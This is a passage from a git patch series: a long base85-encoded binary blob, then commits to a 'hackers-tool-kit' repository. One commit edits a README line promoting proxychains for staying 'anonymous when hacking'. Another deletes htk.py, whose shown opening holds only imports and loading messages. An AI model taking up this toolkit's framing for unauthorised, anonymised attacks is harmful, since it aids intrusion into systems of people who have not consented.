z0cOWsoc{mA-FwG1nQd*uIEdMAl>n%VQotJ>D#*b>esYjQ${J`t^GjNkElkjFGuvQ)W$j{$TFtm(osk5$o)ovd&ibX4xrI8}EIjwo#BjC{g~f%jm#^mS)T`Ls7^%g(>_@T@ zNGk72j}FC}Al-hNJ9jK5VO+`I%~4Pgj1-n)O#L{c)O^POQyV#P@o8a6L5*z~QnL?W zpICVAoR{!gZM^falN5YAu8ubctO@+3v!NQiAM#8)u4&qNi(k;J=djTEG9}?xDo9GA zX{zG*eR^70%{p6*|JhlKF{Hw%Yi{O?@lU-x)*aZ>HtM9DG+QgnOQiyVcFrM1xQ3K7 zx6`Rv{a#khSE460@&ya(X%V#Hb{ zfRPtw`pio&Nih*Y{|Amo z`_8|Y+Uw@r?5$0y-n3jL%-^v>-6u)Ia(v6qQu!Hkobs6(Z;k%__a&$zW+d7)jGB2I zyVIyGLb<(HJ6&X|-{arigdHeWl5(^UY24;~6K9&`(-_{+Zmot#c~|cLcCl0ctki}v z2OjC2>|ctdadvvVA|uDZ{%9ksP*0)?r<*^df45|CZ(yIvwjgREdebSy*EB)5YivN$ zrsT+arB3IN?aPmFIjrSu0WWTvrfIC?mhgOef9C57Ch>lh)564H5-CMsurWb|wW(|} zNwae#&mJC7hcg`2)o%4~N;!Wi!<;bh0(#6$)I>~o9;oqT!BbvzR%m}@WT39$O&&}N zP{@59t9_{HDmUO17B5P$?wEGr@F{Fi;#-K_E~xswex&7Q*u2vE$}plQbtxjRF?+6# z7t=_0)&`m-c=h%8C`C=+cuIbv$*^G%MQIt8<_)FYg!xem@m|Z<`u^(BiHf!`aEPdq> zj8N$yWz2*s#q8zCq&(NYJwj$557PM9h`}kxWox0buf(~(Kr8MAS zll+FdELJim(L+u?&dWeguP+e=s|vWwKG!l3cCwpa=d4w)Z-x{m!P?ct+?#1*$8C#E zwI&g!%uUMKmeiXRB`D4^>F;{O&76CZbxKdhF9;ot=YxgHH|ylWGALs{XCT5~C->(x zt&Md!Ta;vYF)5?uRrtNxl<*` z;Iw1oXx>08`7+*U`Vpy=hrFWe%J=#Tzd2awOlzrC<+zJ0Im+~O3(UsyB_zpr z)M9bLzNj1&TTwjrV2473`V{lUJNKDjV^|w--x6fHW6N6a#m*udQh(!P}Xfk zUi7)P2;K@ClUl1kgN~P$GtaZhJHl?OJFF*zb0c(SXP*jP3pw-Lj71@i<^wTyQT6oZ zKtPc0v$Xvf2C3?EC8;Zp2eLAGFF$`{SzVdvn(;P2jz4hc$Tr&H=?pG5Vz*xxzUnxb zJom-WN9tb3O#gVN`rtM%Mn>nrVsyN7^Z4gvnXxzVW+vSdk5PU1+}%}tK)xfIqlD3K zyy)}zH4p0-i5xIr{r3YVw)IQi$ILang_vTe8qR4(GU0NO9kk8(h9uBEb=vpSiw>UF zZ$V$F@MwDTj+AAd`~jNGtb-Hs2cqF?K@a9K2nTNV_D3@DLwUGC;qcSv&_YK#&5qcM zaeD)e>Vy=V<^|6vZD*?%Do@sV9?X1$NrJl`D{3i4fUlTQU-viz`@=IzsK90P_P1QX z{zD$KodujlD?;8^Wm8Z{_-uP;xPmn7Fy{W(2T=J#S?rC}<}^OJ2DqSzPDRB4|+X{z<-@I;BoY~!6z_KVz+VmXzb>M3pCGM?%oNV0K;4-Jl zcrY8LgdLbIol{Nm(}Ud3&#gyns#ckSMZaynWxIX!Bv3w9-9}Gno8)P+e#14sIY?96 zgqwu$3li4QSf86oqV6;AnL9dBO3nDSOQr14$Z@Z$+XADMV1USHCWzl>+zuHk!qKv8 zT=rnudT-PQVEwDibjsZ3@@pzy-Ooua8Ke2=KUtt6H6k9p7+3bn;MLrC z>7Ty!)q8BK1COoW-f`v?wPc+jE9V7x@Uu&K+_+N#%UI(~*VNaP)f)~y1&4Q4qdPe1 zJ|pJYVy$%BfR3du1I*Q!GCJX>Ls#RQaKRe#3&9}7zUi+oHej}(-iN7aib912tqKLY zaSN?E-9EBXq$hACH{E|3cHrk!Pp@0zdSohUYi~;P!#cX}`asoQK9p2(D;U~e4xazi z!*8=VDLshnebX)E(l85#9KCpn3mH(clV z<;|@U8`^cndbww135p82hr4?!MqW+``e*aG8BV!gt-W z!w=fFV-$BI`8HD16hjR5dTo(CvNty z(Ay;wG@lJE`eC*V{(uudP_@PX_lSJ#C#S=FiJK2^!;hMX4xGS60_>M4-!U@tGke+c z!_hDc6muw`23@2yr6(DsN2gSBu)6;+85x{BUcbjBc#;W(&fMbmTIBzV2?duro zOG*@BLZZ=)G=0l=+e5EUpA7N59d>R-uQIid_Oo%!dwP`5_DZFlkr9eaO{Cz@VEkA^ z3b3232?OA5NIz#Rh;)5@^Yr>O_qv?Wry}ewZ*UT+l@*{suDmji!r22{%&OR&Jy@T; zJ`$WE4I)R!ji+)$MEu(joNv6?hi=scx6Z z+1`&T(3>N}&#)qZq`@tKjGr0ST>D<;s?sa&JjJrT0Z6g7o0aKhj-N03`2KusfO|1q zN`n;So~54Kx0gX9-z!Gi;38$z5E}`$(yuRF`ps5>(`-*$$=!-_VH8pDF!926Z7#U> zRZ5d6)RM5xu(iM5qB-}963mTM&xzHJx!k_Gau|hT605wry8Hl)`nMMG`-WW!W>#qq zxD$IM`;K&hz1To|Q7((@(fSf|_-1l;jtc}+8r}VO+z_{d;es6Z z8V|NOY0SVJDIY4g$7N6ojU$#&*%g&1N@r!Z;#!+c$eB?~sH{b@IQq~Y5-Z}$Gh~Hv4ayg%r z)FFH9E+|C&)BD2HH=1uw__*IOex>04Ql!P2305@Yh}nA}f5aPZqjpY}X(WDy`RKzp zqLQTd3^&F91XS0Hjm(35aw%2jJZ-jG&(pAKkp1|28O%5Kt=1=)QW2SaBpFRh0~b&tG-s@xHi7Dh#t@< ziv-ieg6%_1H^!Fq z?rN4tRClTB-=yewg~KlZ?4be{O*@B421{@HT!6k(53`Ar|ua6jZvYnIe>tLzn1wK*Plu*Fz%oqC9&V1(s zcvfe8b_Jl{`dUjPQ@!5;H1!of@z(h`LSGqO@;c7cvS+RStfA~-qQv1|weXp2efH|1 zblrfe`Cqg%7C*>1UIV={gQ+yle@qNFw5w_o2)ys)~AO?YDRYd&bkC=SS@!c#h!>0r7( z;^M<@n@QG|XTSTpcO0LWLk}@mpl6a1FC5wBb91nH7i%t}o~kM$6?mW{9pEd)6Vji8 zn>EqTq_0~1jIh*NnH)@t>;c=tIXwgrzpmEnYiq}{aST77lheDA3BI~{7h90C1#069 zOXP~MAeAp(j$x|JdPMZgFH^4fxdQzvDXqg!>A-Evcj(d8^O)>fb1~b39N0AE zhV{e^;G8PGtS<8;c%br3FU|Ef#Y(xRbKZo1X1MR!qhn$3uV-CwxFA*PvMU_V$ywc2 zko0`&uF=M%>!reA%}%n2_(s$H)HYg|fM-zM zx=}a|UAvEvS1VdE-2`(r`I0Rc|BH{WK7@>qL4IWf2qKn20_kBc%D%?Y-fny}iT^ju zy{~!G{J%kd;Xrv$JwZT;+#nu2Kulm0lC%TB?A76>(AW;< zqR?;w^1GP~bNqQpKg=YzU(h9{ZY^8Q;kadeWjGaG^w}!|W`EKio%HJ%yb^@oJfw} zrZQq=AQ5#Oj%*1LkzYx9ou+-qKkLZPdC7VnapQn}=Q*y8W_`$9o%s2)IB)uwu^W+Q z0iU(}hNnT=>|r{d@xg}m^+e{eK&;>LlJ`-+OBv4d7=WiCw23b~~Lq6r}!6e{**bPB# z)bjeZ!Q)CQEu;G+lp+Z`*{@{+avLEArw6AQ?PYC%5DMh1$m5UE(Y@Nf_~m_eGt2Fx z8#V&e78v6Rsi(Jcus93uUFCYC2M_G%u4WoCP>cIl!38F$*nSl_-pf`7_s$}j+WNeW zi`R^;3!1TQbyVEQK>Va>m58qCsB{d9A#NK4%Y1Tq>kpsSY+;_X`{nCESNhD`JF|jD z`Q(B}$yE?-n+~)DT@k`?siwm`@>PA;2Rx5nB{OS18R=i!^pz+10 zueW^NW4HF*1UXE7O#mufrH~!{4_-ungY8Le7D5LpeWil98|iZ(nUiA;V&rSnwh58B zE<+WCG>Hv7^mpl;QAm7_WS5)km3HYja3x%$`=gmvL53 z??}8r$%u8F8^$E4OvgB7q!CA2%Htl9#1KCx7mp?IRgg_*25}Npc;#qO8nhVj!#xse zCaf@^rT1NktU=Q?>SL-v!6Sd7Zc`_llFar^A$L1wBdISbQq0Ik$^RfOmPeBwsJn2L zHF<}Od1qU$+pRvab(iJK4h4V~ui=tj(~PTxaMMk$t~l>$Wh0LGc4t*zxij$T4ET$5 z)$@0CPg&lhx%5-BWMH9X&;XuuFzNh)r}4_jnMaQvz54k0ZY)v)I@yqng&5tx(3_@u z9F$uh%WA*aA(n16@#@z7bFSIDv}s@J5#iz8r_c0W6P3+FDq;!?vp3mE8@B$C-=phL77 zeyaCr(f;~caDAYWv0rIK@)E(u6i=>}y7>+GqY8iVlQH)7aI|nQuFH?ykmi2|sLMOd z5>$xM3$E*4{j4&VcITyo#!XlrJmi~6)16YKUbkEe+N=7y@(5(#i~Vq^KtwOdc+ZNZ z?`w$koj<@+76-M^<2f?&A&9@QCvIXTp=&M6=+(o{1AmURo?^i46Iy2;;&}azvuJWG z9adgFkl*ox2FlNNPhBdIB|b227{{dAL(mStXcsu(GN&)Bv}QF-gz0EY`T0mrFHJul zm#K=)xTKcC6dKiCw!!)WUVlEl*9wnypMKJDX9CbOr&$*J@+6jT=iQX!p3PQb6o(di zCq2l%Ujx$mu2jar1Apm>8SA?e*|ft$>CiQexy6ULRN2^%yAfmK3LoMC!1Gyzn>)%X zIo**rUsHZE&VXi`Y;}yrkuZ-iI(_kb1uvTUGD?Z_MW$g$dQbm7A8NGha5}C2=2wsj za-qxnQ>wt#p5+ugw1Tz5~^ z4exz|2IQLvR7aoT26}7qTJkc`RSWnW0|*aeM72o*AHctxg-{T=>V5TDX-N%c4^(3c5K;0ro3vzUT~c4ZOd6{B1DC%PdL?9u(SHvD5w&c6&VAm<4~|@AcE1 zci5MX|H_9X%@hSwvv`KyEQ3zP()vyf_5Ak4gP&*k{*dn~;3-wpuJk0N9DO*8_7YSd zU5Y8=GjFf-HnW}UYl=18Kvy`LU%d2tQ=-I%I&fiO(cM-c7~o8`{d|{}*i*8=GJK5G zF^_NV4^~Oo@OEE%7>m->ZPh7EhCXwl+)h#DhUXWg+BPqssuj$GG(SZ5ZvXUcd{e}~ zhA&s0IK;7O^hL_8aM~G#Ds3k1AP?*w!jyLxG+zP8Dgx?^9Uay;IOx|8X*-*C)$<=F zreLUwYUanzqTeK$_6)Rm=0>GlPq13|_Bk??AJaNK$rXn?UbuK^>07*OGok2ekrA-w zV(Wy@2^k9MB4zP|rHVzKgMdUtruZR7-tM6( z9;{cR((bvwY*D(+w3F>9o4W%b09L^%k^w9!=(s z>blBcwC+dc#=hJe>L@Q#IE$0X$&^*PFv=Op|WznH`P(} z9c@woVS=hW5Dm03mw5?G)qn~JO#mc=xc!H?;Zez%GF1(rQSfm)@$y(W71O{Uk1Ov-J+3VBb^&QkYTeX+2My;~14uOE&9N&RhndU$0 zBy&|ls{iDwFn!jg)L(qWIruC^H*Ci3*VD+QdcYV-?@N(^W(+g)Z>TLbwbsbG7BRr1 z0b1BWc5Zg+6Mz`6&kM(-CWh~%2Qy zH{%BgD5jv=AwAuK_LFmjJ8<&_3{q#qg})aq*PkBq{#P&8HCNf;{5R*^Y?ZWPF24-Y zur10pgj4Gxdx$5}#nP`!i2tU|prX_LD5sYa{19n=i_bVXA3V11PUhwcD>>Z_|#OtbpaOEk9+RzW5==CoQR2@a0{Uw$JpNngc>M z?nch#b$owOgYDxns;L7%B^JP#CyMmKvKy&>l;+=}Ex6Vo^cnLjm??_!k&)nSAapnw zRDej;WSPXooE4pwwRy-70c*#L#YOBoul(q7_*bFS2ymsd?B<5b@g=}jc6}ON6;)~sr zIUXxBFY_9&pV9w?L3}i-HEY0uXn4KXciZ~eAHs{h?XIpa!et~&oUo4l#*4kiNNF4v?T!`rEK5dNL?}}&~pZW1{kzANEG_b<<7Ty)tpV8O3^Jn z5}3ZSQki^h>{6{slfrQzFB;U2orK67Z0+;(7+(JU<71WWzTVxZiW@xUW7oo8; z4Po7#Cj3lx#}s)%y^lwKl>lrjDy6bK8I%cuNA}sl$6Xttq=XHo%YmwF~0DEojyykSoAyPuvc6&Bi6;+5{YWn!@;!s>0S_A`iK82OQ+jKX&70)CzSlM91L zzy=Ql{tYkmvf_R+{B368chN^R;nEM&^Uy=D?>KS5)THcXz4r9s!NtnH37KO1!BX_C zkcF?NZu6M#p!ye3Ixp*)_Uz?-p_A-uxla4$OzCZ)3vOYkS{caCe2 zBg(Mt_%FZmH7D-x)qftX&`i^q11SY(i%qIzl8yVpPJzeX=D^l13sVy{p6O8mdusM^ zqrq(#PaFiu0nR`5$oD%q_om)oYV?b+(5JKWbY9^6qH&A&In;SQ)VbyvdQL_Gv|yyc z@j8PX(22BNzF0VOwn6=S8TplDLD#vo9-j?aE(%yLE4}T4q zA#znNt*^>2=puMHxcs$zC1c$%g5LIQvO!m4yr}Dca6&E*lU;2|d~G%9QH%X0Cyf!I z%@4VXQ(g@S01EoM2nPS(L@=e=z79-&JY%CDuuxw?`FAc6g}!-89cyq_y~>K`X3*NN z>5XZ-yQ&SV^R>eVN;z^PV3Vi7;eqpIc@nWbht*Yce+=lJ2!F9UNW+?s_#VnC#JJXO zScgME&S_QT4PZnEJCz-bE|g4EuLT&?z>qG5cya8+1G=(s02;=hQpVU$qcI@YW4U|jh%tdFb z$!`-~?x^|)!q;@I3#iYXV*ZI8oJsTi35D0HhUGYe^ZrRaZh;W7jC;ZX$|xps{0HBeN5X&RiGx&%`&y51{sx4mEka+AF`lrs;#1L zg_Lt}x>!iSko79n9y-Xuoo5ayyd7JgLC(pFQFT{7{7*s?u|SKChSN1ioP9g{2Zqr8 zW);Z0>ArB|l45EnQI30JYjbvC1AlNYqoX>i_h1>SR)F4Av)8jOMQ~%P(Ry8&JJnj9 zBfuENlPqc=OYwG2X4f{O;aJ65X&ZHYeq3&Gz#t%86@CUlARvUnY=!mwLC?sW^v4o4 zGTt@4a=y{+C~Xj&Bh2zo`pRJVpW>8Z`-%e)t;kv=zzP)xH&jnT8e}C=&>@yB0*0je#Dd9e9ZVvW1r*6{9Ce%EYr~L=4?QYj~W*M3S9`sZoB_V zz9%T>(%E>^&u?w`X0v11bX!nfbrAE55V~M+^q)$tdasYIg+3j6rH7z`W^Vg88}$bD z)L(&E{nIsB)e#fG?E$6A6cDV?3DC|qqW6V@hD{^AXYz$q?^r(XG`nZdIC2~!wTpeZ zjFd3`sjj+`Q)+haNlEVE3yN?R2l>+AgpljRFzm6Uc4s44SRvt^%RtAYZDe%c-}1y5 z(^`3dt4V)Gc%+TS>(<|8r4PQg`F9sOvbBn!3vwKUxmvZG|eYWLTSmE3!q~_799jZ_`0-JHrLn&z1`O zB=PdkRigtkO2F>MWl9aRNN|H-F&9Y2Gv#bwu=2MALh=)3f!>8HgI6YRn)bP$Ukc)J zW?7I*pcLd#@w`2wA`l)J4(5DkUEOPJsEx`MN9wifqtaiOnX9i`pPAOId|* z``!^i+Rn_xuXja2DVD5939EEK$H^I#w!u90roP9Nr8UOK^eso11h!rv?9JUTpS#9z z?q7|-rhDf%UsFZsznnV$K#R-}K!lfVm>E+L#P10?cr!;t{OoC8#0|7E=vrk=lcU;3 z+{_)l64?9q?dxegz6Fi}6U9PRh$Zb;ZfAB=RwhgnT5{P$-BuYQie z=W%Zh%LWRk0qGF(@D?FCz0hhc%Izor9sA3Z$FF-7Mt1Q7S^@q;GIE81=#_G<+qW4{ zy*Q`FG&wFu=lUa1s6kp@iQ3?3Mh5p@*H5lUeXst$42-Pm`&+st_fqM^`A({!wLWy7 zzm)&AI8HWum4wD*5$9Dyt3+T{AKw@WPV|$fN0#E`dg~_&eKX&c5r=s~e~BX83Y2fS znzt5UDMgeM(h_-~$TO$j68m=Onx3g&Q9ifhT=Uh++Nu)0z79p})UtVYnfSK}ZG|xY z3V%%rAV!>aFnZG=>``7jJ1BPK59jIMiHXrrfK4T#up3k1Y_gjRLbE%QhFAL9e-+p| z%2POtqqzx0G;F3R`1vo9yFvPXKYKkkr^nVwed~z!j+NM09ZmW~9;&(N-;^D$nz2RK zHGrdIV+k|!_XcxMS>o3nn__SLLxz*r$^3-m08Fj-215zF}j(@XnXpIcw)F^GQurZW9Vso^5UEHLO;G?)C!g+MMk&jbDrjPV}Mqy z`=}KH<faV#oHO8+ViT50BIL&yZ7S1!OSB zbU!BX{7gqv5|k|3^DtqHNC;V9O+Ky0d4S5j1yuEkLS)gP$JD^AYHh#-;p2z z?g0+RuN_bg=f+)ApY|lJqKfJL!&yEx63HH9Ly34aF*yo(-f?{ww-{V=^y0W1B#|K2mEO$ZZ)Vm(Hu0t+jHp zZ?=L0+ouH+y<*+6?H{t771}q=RNCbg&qI`a$^$p7fyV4R3B>jBPZ9{8yL|}b7s~8n zw)|Vu9foKz2u4VSoE7!deZ9Z(mnX6a2jV70h9a;CkUL;js*QZNzo`cn(=2jj%>hY^9> z`L9O&krD5epJ4jXeEVP78;gKH+EyGUtp38q-0S^clQaLf3w)ycnxo)(Lqhyn^h!#y zzvT4MFc9K^hJYgC=yJ>61t5!gkJ#Zk-E|-0ThL3j3EP z5&RET5vDchpJa$?^xyP*P!#*sQUP)V6IlJ;hoIC9NY+_&l(l66HD5hzHwx>_Du^foap{n9+j}Lt-j(!au?M*fJ2sd zvlJE+?#Esf4^R8DH#IqEsEr^gql@WR-`(K)L@`{sBkUdn~6*l|zP0?>1*U*1U z!_?lO{12uAZ!6=)Q3<>?aDKCd3H?Zv61BY=5IlrLn`%JFx*_v!zZ@VNn)T>0^-r(W z521W&ZcdLg$EFcAj(cWDWhnqlLqSNexXYDc+>ZotaR!ghvKt=y@ZQaN3^7GZ%^uXw zkWdKvWbVuPUN$yn_Vt9$0ZGv}!f2!gKKd5WrJDn>XVaF=X`mgNpOl%d_mH9okUk!P z3*HSc|E`(_st_5?~%d|Dk-?VN<{-9*f(CIa^z+nNN z&)9%f`cu?+la^j_)MEe`v4Hdx&zz=>01ZXt+~nKU5;Z!S5L!2@c?8efw5i6A^*<5@O0$Fl!1l_5uiC2bDiwH3uCh)RW|ODOgPy6SqciMZ8bL9z%q2pq{@d( zBsnTj{6pL`O_Trmo71%{_oB4<6gmCGJyj~4;icPdZia9)NQnPvw7Ek2+k;yGBq~CD zb=OO=NZy?Kf#7l{eCq>U?%67LH;LcTHtVBrW06*QK^VllLVaHy3{*A$NkLSB*5Vqd zp+D3BkP2v&ra_4@u@H!2_rt)etrX}ZQbW;RgqCd z(OrL3>AhFyK|t!)K$+o{)ZUG*&UUcBm6UiNNXBMAtKL4kjN$8ADS8?_E|L*fjLAVzo=KS zS*{V8{AehDYa>_v58=zQT10l{U{Msn7eOP*=|%R6Ec-X3rX(V>xes-M%?_t+geBO9 z?F2{9@4S`)iYdx+NYF)a(#mSlHm39*$eYA)7`Nl!^p%ynfk3A7MrxVHpo3pr zb5(g!=`J8PT~X^5Hq6F?jhBFOVFr1soP@^#Nqwb@)!VrZoyvcsJxUd7?D_fmb{qba z&yW?>e?=jWQwt5N^+#o}ttjdGNEPqih*{K@9^Tm0oT4 z&a;FNdq4Ql_ZjDC(o#qs)CBlE^SO#tz9=+zb!3tC?3Lr^`g;4lyMGLDC{tn+{1)gf z0OD#gC5u!D_3s4e<7&M{nr=TYpPuuSj!jL2mP)R;fc{~!!IMFW$pL-Ej;?LWmH_6!KC4vNZuxCGQ&FJHewTGiBu zN3yP1xaSRwG?ofFJ$1ylPRSIt7Iox|1U{e3kIyXp0{1V*Ahk;AE?!Jl1PT*??IxX8 zRJNZ}ed-?B@_q^;treSsy1hLk@P<$3b%G4T>g%e9_CfYPwK(-)k}7EC8}x-Yv7V;b zjNMQUVbpd0S84GwWUah@j{d%8T!MKQr!l`sK)7p^pB)_-p|4MWp`ytv_x8C3>Xb0h z7iHOgT`3M<4(J@90!sdPke2K8+e?|Uw_6kPD zU(R>rPaTio(n7{`6V9*&6~!o9n-^ZZvqi!2TjBrP02oJf8yStI)Sa~7X-(X+FP zPPfmSF!jHRXQQ)T)>OK8?(?t8l;L-rlzzT?M$p3iVvLTphVGqUUfr?6hA22+l8t`v&*+qqn#E@`7{|B$qxFdgoKR{4#{YXN6`>7LBd7ZQYt( z>)JX%j3#~Y(Z}L^w+ zhFv1*&3v-oZ}3;1Q?YQx$*+u|z^7gIY7L1iK}^iG2a{vQCXHopYif#FOZ2T1*6TAEu*B6OY_7KE6JYbBU^OjM!1*36mQd$Y0u zGY{Zrt2@l!nTiTQ!CcCs#MGFlUs~S)VG&yX3ecgo z)huOFW927b&lxZNxN9i)IX}IKf$FVvFhm#7)tj&I&(aC3N zLW7RF5);L2JyW3{H+OQb4#RvYx<9ieT3+5_?P0(s!*^v=` znOmpM6-UORy{k!bU<$}X#v&89KA-tM(Cm|%#&%;WODXu#!K3q&JL`!%AEQE)%F@&D z@cN?Zy|q4G+2gEzG`+kCxBPKut;_0Wcg8_&Xy{IRhlVQzA#w1fSdwt}E>?Dn5JHbK z1d~JGL|D4Pg9}!_p@+gu267$E%5==LXgW=Nfl#|R_bFZ;lh-~f7gd)cRO~F#(?(Lc zC~$XmUCWh+%k~`(Rd22<|7p!gIWJ{L5C4CdGOy%^DV-1}FbVvi^|o%|Sz=2*7h7tj zB*N{myT80?^SCN^!A&!KZ9aN$!c?aqP@m4QEPA{zM{CBQ&%aEMv~p3YrG>izx;7-l z0~V@ZSY_zwnR&$%;5Ehak%NN+mekNXVsMiD{_!P?E99TQKK$eTgNu6KKNs^-m;CEz zH~!!K8T%3gP8I6_J9HTzOU=I3uJL{@gk-Ra{Fi?k(F_!iM{Y%g#`h}d=<0UJ?=KJT zJppGy6dS<{d(ZysN6FtD3qVp(tf{N1sWqC7a1{SUzPke{dshR`sQ=ZS{_mdi|L@;^ zZ+cNrz;CA6&2(j_uGGu_0E21ME|Vc<1wf~JybwJN+l)guON&_9@6xVRbU;E5tS8AI z^H|J`g1%e{p!;s6T`pMY4mPr_hLIQDY=6A7nMM`wkvYP)?PMbD@7v?=q4;nTs`1)z z8(t*Q9t)LdFSI7eJhqY9f-{D6yxcgoyk!5@fUeL7b*W!De!V9P3j9DLv6|3-iTd0MohpP>Xx`fJb_Tn&uzj|e$ zEhi}(6*F#|P9w@j6!BSbp`+y^;*{h4_G$f;X*ggiRi89y@h8Ba1BM#9_MH-3I5Q$ zp!#CcIdqfDlTFs4n}Of@^^Mr~4=AlH=h*ez%MfB^-`b^h-*y}yER{9F#O1R1TKT|*#lz|Glx>(}bm|2j=3(f9@0E(R=M$C#cSEX= z{0H0Vt#BemHT%in(TR&P_fZkrOn6+`(0!HeT+}4=zGtd;KSEQk(ovM(fElJ?#uT&z zL@m}<74;s32`&>L1zJEC;2A|N~8jFNl0x;q5N!+EzwyHk>pP6&ZN9@%z}7({4pnu2*_nt`B&BYuGIyajzRL+Zm>y zE{_FyZTj@4HwfEkn2t#wO)=B8yJavi=(cfhgA<@OCHb-z0wt%KPPi@6hqP-5q+YpH z#zaS{1dWJ0N0_eB=nHRP{Gu={&a+-mwv1odu!!CyM0G7Rl)={yW>95$mzsIx`kbmU zWAiDU_89$?Yu79f#t!i_DyLBB7E#VQ`Fd`o+A{q-t~!Wp9c*4iM`)J(x3Sx9qalU( zXt2rCU1vyYV8`bLiE5Q4IXymOcJ!f*4~vi2vG_-u1H(gn@FW7qpUb_|+oflM5toGjTxc(6TLjPQZAHswgl2;aag32SR3Lz&f zF6tVoaAfx|v%c7{;wnF@yxcW$plW?_EUdtGyg0yzjB{Yt^WcGj%<$uj zN4rK}4e@|2y>U&`H1#l~V!`mF2R!yMkwb{nB!1?R_e4D>uCFm$Z4Jc*j}$G~Ry12* zi92lS>bkDp=x-;=Z^SI1?$i9u-Ah6dHh4{V-$Jo=U2>K^q#X>51YJu5$0^t%n;MVA z`#H04G%Fb0QIR;Md%S6w%K;%CVe9JFLQW3hrpBpvRq@UYn?`Fr}bsNi**qlEFb&a@~A*y{4X7d|*aFEWv7% z*qpunAv|={Lwsfd?}r+aSu#d>%=pG(-@Rx+1w&acYp9k^PWOz(I-WwkO`%5)w%CPQ zd-jqa6aQvSAbLB)c+b&2-hnxK|FNzPZCRx8v4tMllZf`%N87R)u)z+#mWaeh@H-kh zLu8Mta{4QUEa$9T$#=?dgh;<>I0@zMs1(l7H}q+r#5Dy)O4mUB*On8YyKwW#l4~gY z3rUCNS&lyA+oT5aV-1($7$CW2kvUb#THSeLp#|g4)U{O=j!1_XU(X7&D8nw^wZUe?93Xec(h~SNVk!^t8+?5 zik?g4YJg1Moc2(osovIx^g_G5+rpwQu_QYqY=pjeVtQ9j?G3&Vvtu{hMjHGS|?Ypjw-W=trMA57?|XDQLw_KFq)#mS;iR=qqD)r7+@O|Dd{R^SmntmepCYI_*0 z8)-+T7+is5U_DNajOXbg>%tC=1Srp6=oif6dc`uZ)l>EnEVx%vu4$%qxo!bETmD51 zadAqUjMXH^Z1FNI!xhuo;#f6Tr%>H-FVxKfRdSw@i;G!R65P2 z0J39zY;2^02JSD*_lfn8JbW>i2a;jJc(_eqQZWl4po#2_&JS6Rrj{h9dzKbj%tvYJ@mw$2X?8|F~f+FDt(mmRpbgA@UYcq zqF@s>H=>V5<@@~}E540WN|m*L>L}V{RN-yfwAqN1JnYIOF0t!7feqaYMv6jLO8kbA zBtD^CNLj~Mp^54D$sbE#3jS@aiBECQB#9y~EHeOr_@Sc%p3Yw3R9NQr^^0VW>k+x?r!J@2J->x!?zwbRRA%Nx0$f{KG8Ha$AVq~h0S7pv-+a8DSw6%tjSKz)5rn|5^DM1qg zHgYxBYz`Nr$kEkcq*~}`I+pT#fWu;#EvF(Jrz_ZN1%&0Es+pz|OD?!|;6v`ucdgg$ zS4s(yw$#2zRw|i(xl~`r)ojG?vrNhhM|+% zn?ueG9}?@p&HF4B+Y>kJ{r+_Tzh2?n_P^A}d_K=i`Ub*nMx+8!zbWDR6HX4r1xEOD z{~s8m`DhChCnuxWl4&|knZbB@a5bOa@v+2=BpG>ZiTVW?$j!exoPI~U8I}+@!azGw z_ZTHWA)Si94E{bk=&_tbVRUiiB`-wn9{2^t<9RHE|Ky_^i8ep+lHdPE#WRVyM1BQ6 ze7flSi-)b;k~J5!QR z{L|Fdz64Hz4+ZBh2)NYG#!G^;>7la+-!JJUV|}5&63z**3_aLoIs%*rrQp&`8Wu;B zRwrb9w^vz7BvL;(R2Foa$zAW#i+5omfA2%%BW>-$(h+A8Q_<|~tlJ8F1PP8!#Dfht zC#QD-I8p>qC)IbUV8!Ux_s^#nZ^*FU0vlU)#&V+GD6uherarwhG%~Ul?(@g}*3{Hp zCZ7+C$N8;AfrG;DgA3Rv%xQhU%MUK^pCtSQ4untzhZR0Y?n-7a~g17-*veIF9CxE4HaPI)cHZaOyYE>Y8I~7jU7#)_< zCe6DQ85sD~JzX3_Mrs(0`kP_GNJ{gg@jV*fBcW^`P3NQOd^DW{bHT`L+Ku{qH2aTc zfBI+tsje=k*Ue)AS$tsK1t3^=-7*>P6z7t2yQ{#{i441M0dLD*47_DBDk^H*ubRln zNZ@@d>ZeYd&t0tr>6O-hJ9YZ>;`H;aLuWVavRoAw60${78=`&B%eRH4(SfFimV(^Jz;Nq^Ot|^~-`Aj{7w Date: Sun, 17 Mar 2019 22:47:20 +0100 Subject: [PATCH 042/214] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index faade47..921bfea 100644 --- a/README.md +++ b/README.md @@ -26,7 +26,7 @@ my instagram @unkn0wn_bali ![](tools/screenshot4.png) -the htksecure.py file will run the hackers-tool-kit with proxychains making you anonymous when hacking but some stuff might be slow or not work to run htk secure look below +the htksecure.py file will run the hackers-tool-kit with proxychains making you anonymous when hacking but some stuff might be slow or not work... to run htk secure look below * cd hackers-tool-kit From 5164f468b96919051a48f87258d262eeb7ab0ca6 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 18 Mar 2019 04:35:13 +0100 Subject: [PATCH 043/214] Delete htk.py --- htk.py | 2002 -------------------------------------------------------- 1 file changed, 2002 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 1384955..0000000 --- a/htk.py +++ /dev/null @@ -1,2002 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to edit this script without my credit -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting 